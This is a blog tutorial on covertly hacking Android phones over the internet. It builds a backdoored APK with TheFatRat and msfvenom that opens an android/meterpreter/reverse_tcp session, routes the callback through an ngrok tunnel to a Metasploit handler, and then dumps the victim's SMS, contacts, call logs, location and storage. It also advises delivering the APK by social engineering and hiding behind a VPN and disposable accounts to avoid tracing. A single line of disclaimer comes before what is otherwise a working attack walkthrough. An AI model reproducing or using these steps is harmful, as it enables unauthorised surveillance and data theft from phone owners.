How Hacker Hack Android Using Metasploit Without Port Forwarding Over Internet

Posted: June 5, 2020 in Linux, Networking

Today we’ll discuss the post-exploitation attack using Metasploit framework to hack any Android Device without any port forwarding. Generally, you can get easily reverse TCP connection with Meterpreter in a LAN network but when you do the same thing over internet i.e. WAN, then the scenario is a little bit different.

With this method, you can easily connect any remote device over the internet whether its system or mobile.

Disclaimer: Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information on this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Generally in WAN network, you need two things, first one is a Static IP/Hostname and the second one is Port Forwarding and both are so difficult in a real-time manner because, in most of the cases, we’ve limited access to ports in a network.

It’s been a very interesting year for us to getting reverse meterpreter connections over ssh tunnels, paranoid mode, bypassing AVs, and even getting reverse VNC connection via “vnc dll injection” method to get a GUI view over a vulnerable server with no access to RDP. For persistent attacks, you can even use a dedicated VPS for just these kind of activities along with a VPN to hide your IP to prevent tracing.

Now here’s the Current Situation!

  • We found a server vulnerable to DCOM exploit.
  • We successfully uploaded a webshell (WSO Shell) via Unsecured Admin Panel.
  • After that, we also uploaded an .EXE payload.
  • Booted up Metasploit.
  • Tried to exploit it to get a bind shell but unfortunately, bind shell is not working.
  • Let’s do a Reverse then 😉
  • But there’s another problem 🙁
  • We’re Sitting in the office and sadly we don’t have Router login credentials for setting up port forwarding 🙁

So in this case, we came up with the idea to set up a secure tunnel using Ngrok (Secure Tunnels to Localhost). I would recommend to use any disposable email service just like 10minutemail or Getnada. For testing purposes, you can use your real email address.

So the process is, to signup a free account on Ngrok and download their package in your Kali Linux machine and run the ngrok service (either http or tcp).

After successful signup to Ngrok, you’ll get an authtoken as shown below.

Now download the Ngrok package depending upon the CPU architecture you’ve. Once the download has completed, extract the Ngrok package using the UNZIP utility as shown below:

Command: unzip ngrok-stable-linux-amd64.zip

Now you need to install the Ngrok authtoken in your Kali Linux machine by typing the following command.

Command: ./ngrok authtoken <Authentication Code>

To create your first tunnel for http with port 4431, the command is:

Command: ./ngrok http 4431

To create a tunnel over TCP with port 4444, the command is:

Command: ./ngrok tcp 4444

You can use any port for tcp or http tunneling.

Ngrok also provides a graphical web interface which you can open it by typing “http://localhost:4040/” in your browser.

In this tutorial, we’ll use Ngrok as a TCP with port 4444 as Metasploit is using a reverse TCP connection. Next step is to create a malicious payload using TheFatRat.

To run TheFatRat, simply type “fatrat” in your terminal.

Now Choose the First option to “Create Backdoor with msfvenom“.

Now choose the payload according to your need, here, in this case, we’ll go with 3rd option i.e. “SIGNED ANDROID >> FatRat.apk“.

Here it will ask you to enter LHOST and LPORT. You can change LHOST IP to your ngrok tunnel address and LPORT to ngrok tunnel port number (see screenshot no. 6). Put any name for a base name for the output file.

Here in this step, select option 3, to use “android/meterpreter/reverse_tcp” payload to get the reverse connection of a remote device.

Here it will ask you to enter the file name for this configuration, put any name and then hit ENTER. Your malicious payload is now ready and is saved in /root/TheFatRat/backdoored/<filename>.apk

So your payload is now ready, you can use any social engineering technique to install below apk file to any remote target like Bluetooth, Whatsapp etc.

Now the final step is to start the Metasploit framework by typing “msfconsole” in your terminal.

In this case, we’ll use a multi handle exploit which you can run the command as:

Command: use exploit/multi/handler

Now set the payload as “set payload android/meterpreter/reverse_tcp‘.

Put “set LHOST 0.0.0.0” and “set LPORT 4444“, make sure that bport is the same which you used above while starting the ngrok tcp service on port 4444.

Now as soon as the remote device runs your apk file in his/her android device, you’ll get a reverse meterpreter session instantly.

Type “sysinfo” to get full information about the target. Ngrok is forwarding the connection to our local system so obviously, it will show “127.0.0.1” or “0.0.0.0” to us. When the handler receives the trigger and starts sending the stage to the server, it goes through our localhost’s forwarded port.

To view all data from sd card storage, the default path is /root/sdcard.

To view the longitude and latitude values over WAN, just type “wlan_geolocate“.

You can also dump the call logs, sms logs, contacts etc by just typing the relevant command.

dump_calllog to dump the call logs from a remote device.
dump_contacts to dump all contacts from a remote device.
dump_sms to dump all SMS messages from a remote device.

A drawback with this method, you can’t get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.

This is how we exploited Android with Metasploit over the INTERNET without any port forwarding.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Posted by Shubham ;)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.